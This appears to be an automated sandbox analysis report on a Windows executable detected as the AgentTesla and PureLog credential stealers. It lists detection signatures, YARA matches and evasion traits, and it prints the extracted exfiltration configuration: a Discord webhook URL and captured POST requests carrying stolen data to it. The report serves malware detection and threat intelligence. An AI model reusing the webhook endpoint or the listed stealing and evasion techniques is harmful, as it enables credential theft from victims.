Edit tour

Windows Analysis Report
T_240369_S#U0130PAR#U0130S.exe

Overview

General Information

Sample name:	T_240369_S#U0130PAR#U0130S.exe renamed because original name is a hash value
Original sample name:	T_240369_SPARS.exe
Analysis ID:	1417014
MD5:	73f2aa0989d9fcb98763fbb461422f9f
SHA1:	27b4d0302c43e95c19942eea9dea94d673e18578
SHA256:	843fa4dd9e5d81d150e4d6cd251dc26dafc7409bb4516abebce70114c62548c6
Tags:	exe
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains potential unpacker

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

T_240369_S#U0130PAR#U0130S.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe" MD5: 73F2AA0989D9FCB98763FBB461422F9F)

T_240369_S#U0130PAR#U0130S.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe" MD5: 73F2AA0989D9FCB98763FBB461422F9F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1650117594.0000000005C10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x35532:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x355a4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3562e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x356c0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3572a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3579c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35832:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x358c2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.5c10000.16.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.477f640.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x43e3a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x43eac:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x43f36:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x43fc8:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x44032:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x440a4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4413a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x441ca:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33732:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x337a4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3382e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x338c0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3392a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3399c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33a32:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33ac2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x45c3a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x45cac:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x45d36:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x45dc8:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x45e32:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x45ea4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x45f3a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x45fca:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x35532:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72152:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x355a4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x721c4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3562e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x7224e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x356c0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x722e0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3572a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x7234a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3579c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x723bc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35832:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72452:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x358c2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x724e2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x12015a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1201cc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x120256:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1202e8:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x120352:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1203c4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x12045a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1204ea:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x160766:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1607d8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x160862:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1608f4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16095e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1609d0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x160a66:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x160af6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 31 entries

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 162.159.137.232

Timestamp:	03/28/24-13:58:56.493013
SID:	2851779
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd"}

Multi AV Scanner detection for submitted file

Source: T_240369_S#U0130PAR#U0130S.exe

ReversingLabs: Detection: 47%

Machine Learning detection for sample

Source: T_240369_S#U0130PAR#U0130S.exe

Joe Sandbox ML: detected

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B760DCh	0_2_05B75FF0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B742D0h	0_2_05B73F08
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B742D0h	0_2_05B73EFA
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B74A46h	0_2_05B749E0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B74A46h	0_2_05B749D0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B760DCh	0_2_05B76178
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B760DCh	0_2_05B76000
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then jmp 05B760DCh	0_2_05B76318
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_05C0D440
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_05D16D98
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_05D16DA0

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49730 -> 162.159.137.232:443

Yara detected Generic Downloader

Source: Yara match	File source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.137.232 162.159.137.232

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1Content-Type: multipart/form-data; boundary=----------bbf04aceaf2e4ca780dd290cb3f9ba1cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1168Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1Content-Type: multipart/form-data; boundary=----------9f8a08985d6743459b05911f9073b2abUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 429Expect: 100-continue

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1Content-Type: multipart/form-data; boundary=----------bbf04aceaf2e4ca780dd290cb3f9ba1cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1168Expect: 100-continueConnection: Keep-Alive

Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discord.com
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1220534378975854717/1222892686101708902/user-528110_2024-03-
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWub
